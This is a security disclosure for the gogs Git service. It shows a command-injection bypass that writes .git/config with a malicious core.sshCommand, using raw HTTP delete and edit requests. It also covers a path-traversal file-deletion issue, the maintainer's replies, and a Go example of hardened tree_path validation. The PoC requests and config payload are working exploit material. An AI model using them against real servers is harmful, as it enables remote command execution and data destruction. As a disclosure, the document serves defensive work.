OS Command Injection in file editor in gogs/gogs
Jun 1st 2022
Deploy and run gogs.
Proof of Concept
1. Create a repository and upload a file named config to the repository repo6. The content of the file is as follows:
```
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = notepad
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master
```
2. The attacker can remove the
```
POST /admin1/repo6/_delete/master/.git/config
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
```
3. The attacker can set tree_path=.git/config to move a file into the .git/config directory.
```
POST /admin1/repo6/_edit/master/aaa/config
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=.git%2Fconfig&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
```
Note: Write or rewrite the .git/config file (the core.sshCommand was already set), which leads to a remote command execution vulnerability. Then the command notepad is executed on the server.
1. This vulnerability is capable of executing commands on the remote server and gaining the privileged user account, which leads to sensitive data exposure, identity theft, etc.
2. Delete arbitrary files, such as
3. Write the file to another path.
The video is here. https://streamable.com/2g0gn6 For privacy reasons, it will be deleted in about a week.
Thanks for the report!
Could you specify which commit you're testing against?
I think the second part "The attacker can set tree_path tree_path=.git/config to move a file into the .git/config directory." has already been reported and fixed in https://github.com/gogs/gogs/commit/90bc75229726a24a28507d3e8178f86734f112e1
The test was done on the commit you just mentioned. (=0.12.8)
This is the newly discovered bypass. This RCE is currently only reproduced in Windows.
Checking only os.PathSeparator in isRepositoryGitPath actually lacks consideration.
As we know, os.PathSeparator is equivalent to \ in Windows.
However, the test found that either / or \ can write files to directories in gogs.
\ should be considered.
Another vulnerability is path traversal, which may be independent of the system and can delete arbitrary files.
.. should be considered, for example here: https://github.com/gogs/gogs/blob/509a392272a2ba2bde9d64bf5a55a58d0eadccc4/internal/tool/path.go#L21
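The two points raised above (a separator-only .git check that the forward-slash spelling bypasses on Windows, and .. traversal) as an added Go example; this is not gogs code, and separatorOnlyGitCheck, normalizeTreePath, isInsideGitDir and validateTreePath are hypothetical names chosen for the illustration, with sep standing in for os.PathSeparator so the Windows case can be run on any platform.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// sep stands in for os.PathSeparator: with sep == `\` (Windows) this
// separator-only check misses ".git/config", the spelling the PoC sends.
func separatorOnlyGitCheck(p, sep string) bool {
	return strings.HasSuffix(p, ".git") || strings.Contains(p, ".git"+sep)
}

// Fold `\` to "/", reject any ".." component (traversal) and return a
// cleaned root-relative path; ok is false when the request must be refused.
func normalizeTreePath(p string) (clean string, ok bool) {
	p = strings.ReplaceAll(p, `\`, "/")
	for _, seg := range strings.Split(p, "/") {
		if seg == ".." {
			return "", false
		}
	}
	clean = strings.TrimPrefix(path.Clean("/"+p), "/")
	return clean, clean != ""
}
// Check every component, so ".git/config", ".git\config" and "x/.git/hooks" are all
// caught; case-insensitive and matching ".git." too (Windows ignores case and trailing dots).
func isInsideGitDir(clean string) bool {
	for _, seg := range strings.Split(clean, "/") {
		if strings.EqualFold(seg, ".git") || strings.EqualFold(seg, ".git.") {
			return true
		}
	}
	return false
}
// Combined server-side check for an editor tree_path.
func validateTreePath(p string) (string, bool) {
	clean, ok := normalizeTreePath(p)
	if !ok || isInsideGitDir(clean) {
		return "", false
	}
	return clean, true
}
func main() {
	for _, tp := range []string{".git/config", `.git\config`, "aaa/../.git/config", "docs/.gitignore"} {
		clean, ok := validateTreePath(tp)
		fmt.Printf("%-22q weak(win)=%-5v hardened=%-5v %q\n", tp, separatorOnlyGitCheck(tp, `\`), ok, clean)
	}
}
```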
Got it, will try to reproduce.
Regarding "delete arbitrary files", do you want to create another report?